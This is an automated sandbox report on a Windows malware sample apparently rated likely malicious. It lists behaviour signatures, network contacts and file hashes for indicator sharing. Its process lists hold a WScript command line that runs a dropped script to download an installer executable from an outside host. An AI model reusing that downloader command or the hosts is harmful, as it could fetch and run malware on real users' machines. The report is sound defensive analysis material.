Analysis Overview
SHA256
6d220123b6cd32c5dc7b652c2797e27ba9ce6c40a327d740932a50a3a5b607dd
Threat Level: Likely malicious
The file 8d5aecb4788c4100e4f22d6da5f4f6c3_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Command and Scripting Interpreter: JavaScript
Program crash
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-03 20:28
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-03 20:28
Reported
2024-11-03 21:10
Platform
win7-20240903-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\8d5aecb4788c4100e4f22d6da5f4f6c3_JaffaCakes118.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\8d5aecb4788c4100e4f22d6da5f4f6c3_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8d5aecb4788c4100e4f22d6da5f4f6c3_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\8d5aecb4788c4100e4f22d6da5f4f6c3_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9C4F.js" http://www.djapp.info/?domain=iRceyBZaHG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf9C4F.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9C4F.js" http://www.djapp.info/?domain=iRceyBZaHG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf9C4F.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9C4F.js" http://www.djapp.info/?domain=iRceyBZaHG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf9C4F.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9C4F.js" http://www.djapp.info/?domain=iRceyBZaHG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf9C4F.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf9C4F.js" http://www.djapp.info/?domain=iRceyBZaHG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf9C4F.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1736 -s 480
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.22.144.161:80 | crl.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf9C4F.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\domain_profile[1].htm
| MD5 | c70c3af04093a5c5dfbeb7407fdae099 |
| SHA1 | 7bab781c768e69a32280278790bc33dbe171e645 |
| SHA256 | c14aaec0354ca5a76b3cc2925088671f8780e32641666d84b69f167ba9835cb5 |
| SHA512 | ec26df33329cd89f222bc88b171e9ccd2f3da01e3911ea9061b56d9ab23884883fdb232f8d6d7f39dd6e1e36f53e2a2ffeec1ac7f920706bf5f0978c7c10e6d0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\PQHS9K1N.txt
| MD5 | 37ff855dd3e0e915decc91674d632bc6 |
| SHA1 | d7a080ab66b726454e92da937b858550f83d95e2 |
| SHA256 | 8b1541127f175470c7be0e149ccb3dc9d0ba23977fc99b8b10e45b7b5b221295 |
| SHA512 | 9d70a29c1ea2a7365b68826f9e742213654150fb17282bb95c6d5987f5e3675916f903db963fafe4164a93459422333de69f41d3f044dd7c92e8e22f560d285e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 67e486b2f148a3fca863728242b6273e |
| SHA1 | 452a84c183d7ea5b7c015b597e94af8eef66d44a |
| SHA256 | facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb |
| SHA512 | d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | 971c514f84bba0785f80aa1c23edfd79 |
| SHA1 | 732acea710a87530c6b08ecdf32a110d254a54c8 |
| SHA256 | f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895 |
| SHA512 | 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | 50c03fa614e608b39cec221e330440ae |
| SHA1 | 151b44839870465901949023ec28a4475983fb59 |
| SHA256 | d8a4550b08d9f0c99c172123be3e9b5e083c7f06262d5c9b2f066195ca682287 |
| SHA512 | debecae9c824ad511a0fe95f65d00678116fe4079a1360ce7e705b65416631cbe559148973a9395f0f9d3328a70fac801ca494d963f880112db9f43d6a9f972b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 4fa5bd1a1cc46736bfdbe9881aa41257 |
| SHA1 | 6085d422f71a43a67c0f1e3d63524fe82176c13a |
| SHA256 | 92255cb131778d650023d2740f7c4648514ec56551f61ed4ddd547f890f92695 |
| SHA512 | fc70b2c07248a958e1f3881125e9e5de71133b6ef28af4a9b34dd54817c77b597b88e45e9909d0d052832036e5fce5f315bf76795b7f25e07d05377e46ed34de |
C:\Users\Admin\AppData\Local\Temp\CabE3DA.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\domain_profile[1].htm
| MD5 | 47f0c839c78d146181fb3b62657ec4ee |
| SHA1 | 129d687032b7267c46669364e1c0f7cbe26d1ccc |
| SHA256 | 260987e4aec5cd18617861055d89f0093fa908d4409935e9edbe7a513e2acd09 |
| SHA512 | 923a97c49d82e8e3c6a1674d91bfd79fd90095f1a47d067764aafff346b5466e4bcc7ead75938a60c20ff62ab23d20db7bbf2f78564bcf08deca799e8aea39bf |
C:\Users\Admin\AppData\Local\Temp\TarFC2B.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\domain_profile[1].htm
| MD5 | 41570cf431c1b7c8d8423b0069e6b580 |
| SHA1 | fe5d51f31c3bf74c17aedfb04d5b95d2ea43f836 |
| SHA256 | a2bf40a35d0d0baae341c043daeb26a46b457aa5bd4c34a1899fd4d4e90189d0 |
| SHA512 | 48f669c2578acf4d160ee54b3819ff468cb2399fe7efaf55536d12901c5dff31ab110945b60a2da0d8e12385c2596547c7648cd077d7e9a2f430870c4effa4d3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\domain_profile[1].htm
| MD5 | b9af25957658afba9a8289cc5979281a |
| SHA1 | 301cc342ae99373697ab76e84186c88bb91ada25 |
| SHA256 | f396bd15808846b97b24a7dc6d4630c38a3c400b6d32e82e7b44ab50c8b1a494 |
| SHA512 | ed7005a2ac158afb8cb343b78098e5d2363030a05988f439394977595b153200186e7a5d16887020c25ebb52e7e38def01dbe8da3fd05cf3405b97fed78105c1 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-03 20:28
Reported
2024-11-03 21:08
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\8d5aecb4788c4100e4f22d6da5f4f6c3_JaffaCakes118.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\8d5aecb4788c4100e4f22d6da5f4f6c3_JaffaCakes118.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\8d5aecb4788c4100e4f22d6da5f4f6c3_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\8d5aecb4788c4100e4f22d6da5f4f6c3_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8d5aecb4788c4100e4f22d6da5f4f6c3_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\8d5aecb4788c4100e4f22d6da5f4f6c3_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf5CA7.js" http://www.djapp.info/?domain=iRceyBZaHG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf5CA7.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf5CA7.js" http://www.djapp.info/?domain=iRceyBZaHG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf5CA7.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf5CA7.js" http://www.djapp.info/?domain=iRceyBZaHG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf5CA7.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf5CA7.js" http://www.djapp.info/?domain=iRceyBZaHG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf5CA7.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf5CA7.js" http://www.djapp.info/?domain=iRceyBZaHG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fuf5CA7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3400 -ip 3400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 1468
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 8.8.8.8:53 | 113.6.86.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 66.154.119.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf5CA7.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |